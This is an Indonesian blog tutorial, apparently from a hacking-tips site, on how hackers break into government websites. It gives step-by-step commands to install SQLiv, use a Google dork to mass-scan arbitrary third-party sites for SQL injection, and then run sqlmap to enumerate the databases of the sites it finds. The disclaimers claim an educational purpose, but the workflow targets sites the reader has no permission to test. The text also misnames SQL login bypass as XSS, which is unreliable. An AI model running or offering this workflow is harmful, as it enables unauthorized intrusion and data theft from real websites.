Cara Hacker Meretas Website Pemerintah, Ilmu Cybersecurity

Pembahasan kali ini mengenai bagaimana Cara Hacker Meretas Website Pemerintah?.

Sebelum melanjutkan, saya tidak menyarankan untuk menggunakan cara hack website ini untuk tujuan negatif, penipuan, atau tindakan-tindakan merugikan orang lain.

Jika paham lanjut, mengapa hacker dapat meretas situs pemerintah? Jadi, hacker memanfaatkan kerentanan atau vulnerability agar dapat masuk melalui celah tersebut.

Sebenarnya, bukan hanya website milik pemerintahan saja yang memiliki kerentanan. Banyak website yang bertebaran di Google juga memiliki kerentanan terhadap serangan siber.

Lalu, kenapa hacker melancarkan serangan siber pada website pemerintahan? Sudah pasti untuk pencurian data atau sejenisnya.

Seperti kasus yang pernah viral akhir 2012 lalu terkait 50 persen situs pemerintah diserang hacker.

Begini Cara Hacker Meretas Website Pemerintah

Cara Hacker Meretas Website Pemerintah
Source: jejakhacker.com

Banyak cara hacker melakukan peretasan pada situs pemerintah atau pribadi. Salah satunya dengan memindai kerentanan SQL pada website menggunakan tools hacking SQLiv.

Beberapa hacker juga dapat membajak akun Email dengan mengatur ulang kata sandi pengguna tanpa sepengetahuan orang tersebut. Untuk mendapatkan SQLiv, silahkan kunjungi https://github.com/the-robot/sqliv di gihub.

Langkah-Langkah Hacker Meretas Website Pemerintah Menggunakan SQLiv

Saya ingatkan sekali lagi pembahasan hack situs hanya untuk pembelajaran dan kepentingan cybersecurity, dilarang dilakukan tanpa izin yang sah.

Inilah penjelasan tersangka hacker muda yang membobol ratusan situs.

Waktu yang dibutuhkan: 15 menit

SQLiv merupakan hack tools atau alat yang berguna sebagai pemindai kerentanan atau vulnerability scanner pada website.

Berikut ini yang biasa hacker lakukan pertama untuk hack website dengan scanning vulnerability pada situs.

  1. Masuk root

    $ sudo su

  2. Update & Upgrade package

    Linux :
    $ sudo apt update && apt upgrade
    Termux :
    $ pkg update
    $ pkg upgrade

  3. Download SQLiv ke direktori /Downloads/sql

    $ git clone https://github.com/the-robot/sqliv.git ~/Downloads/sql/

  4. Masuk ke direktori /Downloads/sql/

    $ cd Downloads/sql/

  5. Install SQLiv package requirements

    $ pip install -r requirements.txt

    *Jika belum menginstall pip, silahkan instal terlebih dulu

  6. Install SQLiv

    $ sudo python2 setup.py -i

    *Jika belum menginstall python2, silahkan instal terlebih dulu.

  7. Memberikan akses pengguna untuk file sqliv.py

    $ chmod +x sqliv.py

  8. Menampilkan daftar argumen SQLiv

    Untuk menampilkan macam-macam perintah/argumen yang dapat digunakan pada sqliv, bisa dengan perintah berikut
    $ pyhton2 sqliv.py --help

  9. SQL Injection Dork

    Dalam kasus ini menggunakan SQL Injection Dork untuk melakukan scanning vulnerability pada website
    $ python2 sqliv.py -d "inurl:php?id=" -e google -p 50 -o ~/Downloads/sql/report.json

    Lalu, tunggu beberapa saat.
     
    Keterangan:
    -d –> perintah SQL injection dork
    -e –> perintah untuk menentukan search engine (Google, Bing, Yahoo)
    -p –> perintah untuk menentukan jumlah situs yang ingin dipindai
    -o –> perintah output atau menyimpan hasil scanning dengan nama file dan direktori

  10. Hasil scanning vulnerability

    Hasil laporan tersebut akan berisi daftar website yang memiliki kerentanan(vulnerability) pada kodingan sql-nya. Dan juga lengkap beserta informasi server, database, serta bahasa pemrograman yang digunakan. File tersebut akan tersimpan pada direktori “/Downloads/sql/report.json”.

  11. Menampilkan file

    Terakhir untuk membuka file bisa menggunakan perintah berikut.
    $ leafpad ~/Download/sql/report.json

Selain pemindaian file secara massal, sqliv juga dapat memindai kerentanan website tertarget untuk tujuan pencegahan serangan siber atau hacker, berikut perintahnya.

$ python2 sqliv.py -t https://example.com

Terakhir, setelah mendapatkan beberapa daftar website dengan vulnerability SQL. Lakukan penetration testing atau uji penetrasi menggunakan tools SQLmap dengan perintah berikut.

$ sqlmap -u https://example.com –dbs

Tools ini juga dapat untuk menguji cara hack website pemeritah metode bypass login SQL atau terkenal dengan XSS. Dengan memanfaatkan celah/error pada halaman login situs.

Tempat Belajar Hack Website

Jika kamu ingin belajar cara hack website, kunjungi situs bernama “Hack This Site” yang menyediakan beberapa contoh best practice untuk melancarkan serangan siber.

Situs ini memberikan fasilitas serangan siber terhadap website. Sehingga kamu bisa belajar hack situs tanpa merusak situs pemerintah atau orang lain.

Website ini juga biasa hacker pemula gunakan untuk belajar meretas web (script kiddies).

Disclaimer!

Jadi, untuk cara meretas situs web pemerintah atau pribadi menggunakan scanning vulnerability SQL ini hanya untuk kepentingan keamanan sistem. Dan hanya untuk keperluan ethical hacking resmi yang sah.


Saya tidak bertanggung jawab jika kamu gunakan untuk meretas website pemerintah atau tindakan tidak etis lannya. Selain itu, kamu harus sudah paham tentang server, network, dan pemrograman secara mendalam.

Video Tutorial Cara Belajar Hack Website

300 like/comment akan saya buatkan video tutorial.

Penutup

Penjelasan Cara Hacker Meretas Website Pemerintah ini hanya sebagai pengetahuan keamanan agar situs dengan celah kerentanan dapat segera diperbaiki untuk memperkecil gerak serangan siber.

Tekan ESC untuk keluar